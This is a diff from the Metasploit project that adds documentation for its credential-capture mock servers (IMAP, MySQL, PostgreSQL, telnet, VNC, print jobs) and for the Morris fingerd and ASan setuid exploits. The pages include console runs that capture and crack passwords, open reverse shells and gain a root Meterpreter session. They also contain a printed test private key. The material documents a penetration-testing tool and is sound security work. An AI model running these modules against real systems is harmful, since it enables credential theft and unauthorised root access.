Server:
```
msf5 > use auxiliary/server/capture/imap
msf5 auxiliary(server/capture/imap) > set banner "The Microsoft Exchange IMAP4 service is ready."
banner => The Microsoft Exchange IMAP4 service is ready.
msf5 auxiliary(server/capture/imap) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/imap) >
[*] Started service listener on 0.0.0.0:143
[*] Server started.
[*] IMAP LOGIN 127.0.0.1:42972 metasploit@documentation.com / rapid7#1
```
Client:
```
root@kali:~# telnet 127.0.0.1 143
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
* OK The Microsoft Exchange IMAP4 service is ready.
01 LOGIN metasploit@documentation.com rapid7#1
quit
Connection closed by foreign host.
```
### Secure IMAP with Self-Signed Certificate and Alpine client
Server:
```
msf5 > openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
[*] exec: openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
Generating a RSA private key
.................................................................................................+++++
...................+++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
msf5 > cat key.pem certificate.pem > selfsigned.pem
[*] exec: cat key.pem certificate.pem > selfsigned.pem
msf5 > cat /root/metasploit-framework/selfsigned.pem
[*] exec: cat /root/metasploit-framework/selfsigned.pem
-----BEGIN PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDAXME8r2vEUH7B
Kelkt9iC4tTozOq0wJAjsACLCDcNoD4hUH16wy4Uf4SD3ZsEaL0YA0GU2ZgOo2ud
USBpOo8h9FEGtRrAAeSl7Z3XaBnuB7UmVMrnUVZxlaYi84JcopcTOs6KZ5VXddia
PEkE5G3jaCwOIqHk+c8Qk5b43HQbkj2jr4051gHeWP0UgBEy1TVPKtoywtyK1b5H
QhX7MYVNge8lQL/xJnBrjMDqIQqc41lCI73EPCuGZ7zB06xBsgyW/DTgQkprX+Qe
DVKtz8ZChLSqSwmz/5yFttRyZlDuXA7Kozhdj8obRAjzK/gKj89WsX/s2KUbq2GY
pdMpLh7/AgMBAAECggEBALCtQKpdMCzqBdGijgP8u3ZToluDwlprtregco8/51iz
gf0VMXqsg8k96dc3laZyEKNackSlqfxf6npeRdeAenAkNrtjYYNS+c/Qs7Vhntc5
6w6euJHG6g9+9E2LvIMarolx7LvAMbFXwq6+ig5dQ/Sm/DerZWiqbJ18ASDnUhjz
G1Y8/Idy4WutPZD/0JEQ+5VnHb+Mt3a7yYKhDsmUEzVh5xoWJab9dwfwCnoOb32T
oLOLLsqUbAK8ZiQ4MwkbGJ5kw8H24wVmI+7BbuRacW2tIIt6Z+vEoLdof0TsuJWo
87ZbCYYeTysIgBIdLNRiGGxz43SOqBBGh8sreyyACdECgYEA6Ubs1Klw3TViABke
1JqkWelZi6mtsyUHJt/eChjMzgg5vGVuYB/sCc+BObjETbfnvuV0Ub4cxbUCF3wL
qvrJNTd+yU7JJ7IP63B2lS3aNlAsLRb59SkjDYyym1OeUAHKkGp8oICSq96X3Xtu
KUZnDdh2UuoMzmEoAHoDoc+SC/cCgYEA0xmQ+qDJ4l3JRH/IPMPe9XD90WFJFhvF
GzGSM8qqpg6N2xhlzQiM6+I4EEh9iNnCOYmvw9leGNRpIjFjAhv5ntlG3LudAEpd
Ml/hhrfRB7KOopiqzK7oVCUv5f5rmvYdL4c2FC+VGxnhWUP6MARUHag/1DgszMs7
wSlwcbKi8zkCgYBMvRc1khPdwSze6WSZ/dEo/rmFVykb8Idcw3Iwkh31fQE5N4jK
uFWWmJtjGKQDCQeEZckRBuBCLZxli1nvQhakmf/sSy2jEFFqWxG3W2EYUuFlZ9SM
UJ8GWw16SVSf7ybqwQ0EY6dcQJpmsq73hwBprpamCfZygcV9+qVtOnJJ2wKBgBKY
ZPH+6em70zfqfawEoQZD3sfr5vFAnvtHQZa4WpHoJEzReF44S5mXwtKEYDKG5BoH
a+k3o5dSVrSBXzRXXITGpPxatnjJFC6UzZv9YzdnXjMqeZkwKx0GbZK396id13JR
Wc0rZ9oMTJJ9b3N9Xh+Cq6S5EhE0Md5RFSuezcXZAoGBAJOMfjbwobOCYm6K8PyV
p89gbnDOj7FHCg2JPa9/dii6pBRHXeUfORp00GfN0oAjjJo14SmOw58zh1mF1VcA
BQhTK9TO4GXIEZDiYt9EmiH1VO58I8vUecBcbelirumGOP+dBiBy/C8YzFJRhAis
eAGSi8F+qcJaS3VDRGEC9zcK
-----END PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDazCCAlOgAwIBAgIUMlkpAG2tXodgLSrIf/xOuA9z8PwwDQYJKoZIhvcNAQEL
BQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM
GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0xODExMDkwMTI3MTRaFw0xOTEx
MDkwMTI3MTRaMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw
HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB
AQUAA4IBDwAwggEKAoIBAQDAXME8r2vEUH7BKelkt9iC4tTozOq0wJAjsACLCDcN
oD4hUH16wy4Uf4SD3ZsEaL0YA0GU2ZgOo2udUSBpOo8h9FEGtRrAAeSl7Z3XaBnu
B7UmVMrnUVZxlaYi84JcopcTOs6KZ5VXddiaPEkE5G3jaCwOIqHk+c8Qk5b43HQb
kj2jr4051gHeWP0UgBEy1TVPKtoywtyK1b5HQhX7MYVNge8lQL/xJnBrjMDqIQqc
41lCI73EPCuGZ7zB06xBsgyW/DTgQkprX+QeDVKtz8ZChLSqSwmz/5yFttRyZlDu
XA7Kozhdj8obRAjzK/gKj89WsX/s2KUbq2GYpdMpLh7/AgMBAAGjUzBRMB0GA1Ud
DgQWBBRezbFZBumaJ/MViZqqbllYrPomMzAfBgNVHSMEGDAWgBRezbFZBumaJ/MV
iZqqbllYrPomMzAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQAd
Smkooa2nhdDdu3/uHX8vhDC0ns5qotgd0YKGkj/QyzNP+ruP1cyq/q67zand/Eq8
gF+lHk+pX8GM0WvI7ypgrK956YCdmh3DULBFDu5RxVABFWrGedfNy6TKLTps0PXR
9mdB/HK0Msr6Mh/o5PkUhb1fx0T3NUwF1EFte7Nsq10Mq+hYVnEqDeEGMlb73frJ
729tCjNpFoLGdlgEcAEFelAujV0w4oj35CE2Fh3b+4wupDiulfgg9E7FtvS9xK0P
l/m7Kka0n7lXnKo+IFSJ0dTooBvwaV7+4tEGuHxWJsNO+2aex9qFCuDUdBFxyWyK
uBVlsY6F7EjTfWpxwyVP
-----END CERTIFICATE-----
msf5 > use auxiliary/server/capture/imap
msf5 auxiliary(server/capture/imap) > set ssl true
ssl => true
msf5 auxiliary(server/capture/imap) > set sslcert /root/metasploit-framework/selfsigned.pem
sslcert => /root/metasploit-framework/selfsigned.pem
msf5 auxiliary(server/capture/imap) > set srvport 993
srvport => 993
msf5 auxiliary(server/capture/imap) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/imap) >
[*] Started service listener on 0.0.0.0:993
[*] Server started.
[+] IMAP LOGIN 127.0.0.1:59024 "johndoe" / "p455w0rd"
```
Clients:
```
root@kali:~# cat ~/.muttrc
set spoolfile="imaps://johndoe:p455w0rd@127.0.0.1/INBOX"
set folder="imaps://127.0.0.1/INBOX"
set record="=Sent"
set postponed="=Drafts"
root@kali:~# mutt
```
The user is prompted about the invalid certificate, and the client gets stuck at "Logging in...", however
it doesn't matter since the credentials have already been sent.

72
documentation/modules/auxiliary/server/capture/mysql.md Normal file
View File

@ -0,0 +1,72 @@
This module creates a mock MySQL server which accepts credentials. Upon receiving a login attempt, an `ERROR 1045 (2800): Access denied` error is thrown.
## Verification Steps
1. Start msfconsole
2. Do: ```use auxiliary/server/capture/mysql```
3. Do: ```run```
## Options
**CHALLENGE**
The MySQL 16 byte challenge used in the authentication. Default is `112233445566778899AABBCCDDEEFF1122334455`.
**JOHNPWFILE**
Write a file containing a John the Ripper format for cracking the credentials. Default is ``.
**CAINPWFILE**
Write a file containing a Cain & Abel format for cracking the credentials. Default is ``.
**SRVVERSION**
The MySQL version to print in the login banner. Default is `5.5.16`.
**SSL**
Boolean if SSL should be used. Default is `False`.
**SSLCert**
File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
generated. Default is ``.
## Scenarios
### MySQL with MySQL Client and JTR Cracking
Server:
```
msf5 > use auxiliary/server/capture/mysql
msf5 auxiliary(server/capture/mysql) > set johnpwfile /tmp/mysql.logins
johnpwfile => /tmp/mysql.logins
msf5 auxiliary(server/capture/mysql) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/mysql) >
[*] Started service listener on 0.0.0.0:3306
[*] Server started.
[+] 127.0.0.1:59604 - User: admin; Challenge: 112233445566778899aabbccddeeff1122334455; Response: 46677c2d9cac93da328c4321060c125db759925e
```
Client:
```
root@kali:~# mysql -u admin -ppassword1 -h 127.0.0.1
ERROR 1045 (28000): Access denied for user 'admin'@'127.0.0.1' (using password: YES)
```
JTR:
```
root@kali:~# john /tmp/mysql.logins_mysqlna
Using default input encoding: UTF-8
Loaded 1 password hashes with no different salts (mysqlna, MySQL Network Authentication [SHA1 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
password1 (admin)
1g 0:00:00:00 DONE 2/3 (2018-11-08 21:05) 20.00g/s 16800p/s 16800c/s 16800C/s password1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

43
documentation/modules/auxiliary/server/capture/postgresql.md Normal file
View File

@ -0,0 +1,43 @@
This module creates a mock PostgreSQL server which accepts credentials. Upon receiving a login attempt, a
`FATAL: password authentication failed for user` error is thrown.
## Verification Steps
1. Start msfconsole
2. Do: ```use auxiliary/server/capture/postgresql```
3. Do: ```run```
## Options
**SSL**
Boolean if SSL should be used. Default is `False`.
**SSLCert**
File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
generated. Default is null.
## Scenarios
### PostgreSQL Server and psql Client
Server:
```
msf5 > use auxiliary/server/capture/postgresql
msf5 auxiliary(server/capture/postgresql) > run
[*] Auxiliary module running as background job 0.
[*] Started service listener on 0.0.0.0:5432
[*] Server started.
[+] PostgreSQL LOGIN 127.0.0.1:49882 msf / pwn_all_da_tings / msf
```
Client:
```
root@kali:~# psql -U msf -h 127.0.0.1
Password for user msf:
psql: FATAL: password authentication failed for user "msf"
```

73
documentation/modules/auxiliary/server/capture/printjob_capture.md Normal file
View File

@ -0,0 +1,73 @@
This module creates a mock print server which accepts print jobs.
## Verification Steps
1. Start msfconsole
2. Do: ```use auxiliary/server/capture/printjob_capture```
3. Do: ```set MODE [mode]```
4. Do: ```run```
## Options
**FORWARD**
After the print job is captured, should it be forwarded to another printer. Default is `false`.
**RPORT**
If `forward` is set, this is the port of the remote printer to forward the print job to. Default is `9100`.
**RHOST**
If `forward` is set, this is the IP of the remote printer to forward the print job to.
**METADATA**
If set to `true` the print job metadata will be printed to screen. Default is `true`.
**MODE**
Set the printer mode. RAW format, which typically runs on port `9100`, is a raw TCP data stream that would send to a printer.
`LPR`, Line Printer remote, which typically runs on port 515, is the newer more widely accepted standard. Default is `RAW`.
## Scenarios
### Capturing a RAW print job
Server:
```
msf5 > use auxiliary/server/capture/printjob_capture
msf5 auxiliary(server/capture/printjob_capture) > run
[*] Auxiliary module running as background job 0.
[*] Starting Print Server on 0.0.0.0:9100 - RAW mode
[*] Started service listener on 0.0.0.0:9100
[*] Server started.
msf5 auxiliary(server/capture/printjob_capture) > [*] Printjob Capture Service: Client connection from 127.0.0.1:44678
[*] Printjob Capture Service: Client 127.0.0.1:44678 closed connection after 249 bytes of data
[-] Unable to detect printjob type, dumping complete output
[+] Incoming printjob - Unnamed saved to loot
[+] Loot filename: /root/.msf4/loot/20181117205902_default_127.0.0.1_prn_snarf.unknow_003464.bin
msf5 auxiliary(server/capture/printjob_capture) > cat /root/.msf4/loot/20181117205902_default_127.0.0.1_prn_snarf.unknow_003464.bin
[*] exec: cat /root/.msf4/loot/20181117205902_default_127.0.0.1_prn_snarf.unknow_003464.bin
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2018.4"
VERSION_ID="2018.4"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="https://www.kali.org/"
SUPPORT_URL="https://forums.kali.org/"
BUG_REPORT_URL="https://bugs.kali.org/"
```
Client:
```
root@kali:~# cat /etc/os-release | nc 127.0.0.1 9100
^C
```

57
documentation/modules/auxiliary/server/capture/telnet.md Normal file
View File

@ -0,0 +1,57 @@
This module creates a mock telnet server which accepts credentials. Upon receiving a login attempt, a `Login failed` error is thrown.
## Verification Steps
1. Start msfconsole
2. Do: ```use auxiliary/server/capture/telnet```
3. Do: ```run```
## Options
**BANNER**
The Banner which should be displayed. Default is empty, which will display `Welcome`.
**SSL**
Boolean if SSL should be used. Default is `False`.
**SSLCert**
File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
generated. Default is ``.
## Scenarios
### Telnet Server and Client
Server:
```
msf5 > use auxiliary/server/capture/telnet
msf5 auxiliary(server/capture/telnet) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/telnet) >
[*] Started service listener on 0.0.0.0:23
[*] Server started.
[+] TELNET LOGIN 127.0.0.1:40016 root / <3@wvu_is_my_hero
```
Client:
```
root@kali:~# telnet 127.0.0.1
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Welcome
Login: root
Password: <3@wvu_is_my_hero
Login failed
Connection closed by foreign host.
```

69
documentation/modules/auxiliary/server/capture/vnc.md Normal file
View File

@ -0,0 +1,69 @@
This module creates a mock VNC server which accepts credentials. Upon receiving a login attempt, an `Authentication failure` error is thrown.
## Verification Steps
1. Start msfconsole
2. Do: ```use auxiliary/server/capture/vnc```
3. Do: ```run```
## Options
**CHALLENGE**
The 16 byte challenge used in the authentication. Default is `00112233445566778899aabbccddeeff`.
**JOHNPWFILE**
Write a file containing a John the Ripper format for cracking the credentials. Default is ``.
**SSL**
Boolean if SSL should be used. Default is `False`.
**SSLCert**
File path to a combined Private Key and Certificate file. If not provided, a certificate will be automatically
generated. Default is ``.
## Scenarios
### VNC with vncviewer and JTR Cracking
Server, Client:
```
msf5 > use auxiliary/server/capture/vnc
msf5 auxiliary(server/capture/vnc) > use auxiliary/server/capture/vnc
msf5 auxiliary(server/capture/vnc) > set johnpwfile /tmp/john
johnpwfile => /tmp/john
msf5 auxiliary(server/capture/vnc) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/vnc) >
[*] Started service listener on 0.0.0.0:5900
[*] Server started.
msf5 auxiliary(server/capture/vnc) > vncviewer 127.0.0.1
[*] exec: vncviewer 127.0.0.1
Connected to RFB server, using protocol version 3.7
Performing standard VNC authentication
Password:
Authentication failure
[+] 127.0.0.1:40240 - Challenge: 00112233445566778899aabbccddeeff; Response: b7b9c87777661a7a2299733209bfdfce
```
John the Ripper (JTR) Cracker:
```
msf5 auxiliary(server/capture/vnc) > john /tmp/john_vnc
[*] exec: john /tmp/john_vnc
Using default input encoding: UTF-8
Loaded 1 password hash (VNC [DES 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
password (?)
1g 0:00:00:00 DONE 2/3 (2018-11-11 20:38) 25.00g/s 75.00p/s 75.00c/s 75.00C/s password
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

78
documentation/modules/exploit/bsd/finger/morris_fingerd_bof.md Normal file
View File

@ -0,0 +1,78 @@
## Intro
This module exploits a stack buffer overflow in `fingerd` on 4.3BSD.
This vulnerability was exploited by the Morris worm in 1988-11-02.
Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.
## Setup
A Docker environment for 4.3BSD on VAX is available at
<https://github.com/wvu/ye-olde-bsd>.
For manual setup, please follow the Computer History Wiki's
[guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
## Targets
```
Id Name
-- ----
0 @(#)fingerd.c 5.1 (Berkeley) 6/6/85
```
## Options
**RPORT**
Set this to the target port. The default is 79 for `fingerd`, but the
port may be forwarded when NAT (SLiRP) is used in SIMH.
**PAYLOAD**
Set this to a BSD VAX payload. Currently only
`bsd/vax/shell_reverse_tcp` is supported.
## Usage
```
msf5 exploit(bsd/finger/morris_fingerd_bof) > options
Module options (exploit/bsd/finger/morris_fingerd_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
RPORT 79 yes The target port (TCP)
Payload options (bsd/vax/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 @(#)fingerd.c 5.1 (Berkeley) 6/6/85
msf5 exploit(bsd/finger/morris_fingerd_bof) > run
[*] Started reverse TCP handler on 192.168.1.2:4444
[*] 127.0.0.1:79 - Connecting to fingerd
[*] 127.0.0.1:79 - Sending 533-byte buffer
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:51992) at 2018-09-25 10:14:15 -0500
whoami
nobody
cat /etc/motd
4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986
Would you like to play a game?
```

166
documentation/modules/exploit/linux/asan_suid_executable_priv_esc.md Normal file
View File

@ -0,0 +1,166 @@
## Description
This module attempts to gain root privileges on Linux systems using
setuid executables compiled with AddressSanitizer (ASan).
ASan configuration related environment variables are permitted when
executing setuid executables built with libasan. The `log_path` option
can be set using the `ASAN_OPTIONS` environment variable, allowing
clobbering of arbitrary files, with the privileges of the setuid user.
This module uploads a shared object and sprays symlinks to overwrite
`/etc/ld.so.preload` in order to create a setuid root shell.
## Vulnerable Application
[AddressSanitizer](https://clang.llvm.org/docs/AddressSanitizer.html) (ASan)
is a fast memory error detector. It consists of a compiler instrumentation
module and a run-time library.
An example executable can be compiled with ASan as follows:
```
gcc -s -lasan -fsanitize=address -o asan.elf helloworld.c
sudo mv asan.elf /usr/bin/asan.elf
sudo chown root:root /usr/bin/asan.elf
sudo chmod u+s /usr/bin/asan.elf
```
## Verification Steps
1. Start `msfconsole`
2. Get a session
3. `use use exploit/linux/local/asan_suid_executable_priv_esc`
4. `set SESSION [SESSION]`
5. `set SUID_EXECUTABLE /path/to/suid/compiled/with/asan`
6. `check`
7. `run`
8. You should get a new *root* session
## Options
**SESSION**
Which session to use, which can be viewed with `sessions`
**SUID_EXECUTABLE**
Path to a SUID executable compiled with ASan. (default: ``)
**SPRAY_SIZE**
Number of PID symlinks to create. (default: `50`)
**WritableDir**
A writable directory file system path. (default: `/tmp`)
## Scenarios
### Command Shell Session (Linux Mint 19)
```
msf5 > use exploit/linux/local/asan_suid_executable_priv_esc
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set suid_executable /usr/bin/a.out
suid_executable => /usr/bin/a.out
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.188:4444
[+] /usr/bin/a.out is setuid
[+] /usr/bin/a.out was compiled with ASan
[+] gcc is installed
[*] Writing '/tmp/.pCriI' (291 bytes) ...
[*] Max line length is 65537
[*] Writing 291 bytes in 1 chunks of 937 bytes (octal-encoded), using printf
[*] Writing '/tmp/.JtSfQ1.c' (142 bytes) ...
[*] Max line length is 65537
[*] Writing 142 bytes in 1 chunks of 513 bytes (octal-encoded), using printf
[*] Writing '/tmp/.TCLmzU.so.c' (323 bytes) ...
[*] Max line length is 65537
[*] Writing 323 bytes in 1 chunks of 1167 bytes (octal-encoded), using printf
[*] Writing '/tmp/.V7OEFt.c' (253 bytes) ...
[*] Max line length is 65537
[*] Writing 253 bytes in 1 chunks of 906 bytes (octal-encoded), using printf
[*] Writing '/tmp/.LpfTKJwR' (256 bytes) ...
[*] Max line length is 65537
[*] Writing 256 bytes in 1 chunks of 942 bytes (octal-encoded), using printf
[*] Launching exploit...
[+] Success! /tmp/.JtSfQ1 is set-uid root!
-rwsr-xr-x 1 root root 8384 Jan 12 19:30 /tmp/.JtSfQ1
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (914728 bytes) to 172.16.191.211
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.211:56074) at 2019-01-12 03:30:47 -0500
[+] Deleted /tmp/.JtSfQ1.c
[+] Deleted /tmp/.TCLmzU.so.c
[+] Deleted /tmp/.TCLmzU.so
[+] Deleted /tmp/.V7OEFt.c
[+] Deleted /tmp/.V7OEFt
[+] Deleted /tmp/.LpfTKJwR
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 172.16.191.211
OS : LinuxMint 19 (Linux 4.15.0-20-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```
### Meterpreter Session (Linux Mint 19)
```
msf5 > use exploit/linux/local/asan_suid_executable_priv_esc
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set suid_executable /usr/bin/a.out
suid_executable => /usr/bin/a.out
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/asan_suid_executable_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.188:4444
[+] /usr/bin/a.out is setuid
[+] /usr/bin/a.out was compiled with ASan
[+] gcc is installed
[*] Writing '/tmp/.XBKiFa' (291 bytes) ...
[*] Writing '/tmp/.ooMwKnEXt.c' (142 bytes) ...
[*] Writing '/tmp/.cWZL3A.so.c' (329 bytes) ...
[*] Writing '/tmp/.78iKLJOvX.c' (254 bytes) ...
[*] Writing '/tmp/.WkXgm2agJ8' (261 bytes) ...
[*] Launching exploit...
[+] Success! /tmp/.ooMwKnEXt is set-uid root!
-rwsr-xr-x 1 root root 8384 Jan 12 19:42 /tmp/.ooMwKnEXt
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (914728 bytes) to 172.16.191.211
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.211:56080) at 2019-01-12 03:42:43 -0500
[+] Deleted /tmp/.XBKiFa
[+] Deleted /tmp/.ooMwKnEXt.c
[+] Deleted /tmp/.cWZL3A.so.c
[+] Deleted /tmp/.cWZL3A.so
[+] Deleted /tmp/.78iKLJOvX.c
[+] Deleted /tmp/.78iKLJOvX
[+] Deleted /tmp/.WkXgm2agJ8
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : 172.16.191.211
OS : LinuxMint 19 (Linux 4.15.0-20-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```

4
documentation/modules/exploit/linux/http/cisco_firepower_useradd.md
View File

@ -24,9 +24,9 @@ https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=2862
## Options
**USERNAME** The username for Cisco Firepower Management console
**USERNAME** The username for Cisco Firepower Management console.
**Password** The password for Cisco Firepower Management cosnole
**PASSWORD** The password for Cisco Firepower Management console.
**NEWSSHUSER** The SSH account to create. By default, this is random.

Some files were not shown because too many files have changed in this diff Show More